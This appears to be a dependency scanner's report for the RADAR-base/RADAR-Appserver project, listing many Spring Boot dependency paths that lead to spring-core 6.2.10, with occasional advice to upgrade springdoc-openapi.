Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-mail@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.data:spring-data-jpa@4.1.0-M2 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-mail@4.1.0-M4 › org.springframework:spring-context-support@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework:spring-context-support@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-config@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-servlet@4.1.0-M4 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot-actuator@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-commons@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-sql@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 › org.springframework.boot:spring-boot-jackson@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-servlet@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework:spring-jdbc@7.0.6 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.data:spring-data-jpa@4.1.0-M2 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-commons@4.1.0-M4 › org.springframework.data:spring-data-commons@4.1.0-M2 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.data:spring-data-jpa@4.1.0-M2 › org.springframework.data:spring-data-commons@4.1.0-M2 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework:spring-jdbc@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework:spring-orm@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.data:spring-data-jpa@4.1.0-M2 › org.springframework:spring-orm@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-config@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.data:spring-data-jpa@4.1.0-M2 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-config@7.1.0-M3 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-health@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-mail@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.data:spring-data-jpa@4.1.0-M2 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-mail@4.1.0-M4 › org.springframework:spring-context-support@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework:spring-context-support@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-config@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-servlet@4.1.0-M4 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework:spring-jdbc@7.0.6 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.data:spring-data-jpa@4.1.0-M2 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-commons@4.1.0-M4 › org.springframework.data:spring-data-commons@4.1.0-M2 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.data:spring-data-jpa@4.1.0-M2 › org.springframework.data:spring-data-commons@4.1.0-M2 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework:spring-jdbc@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework:spring-orm@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
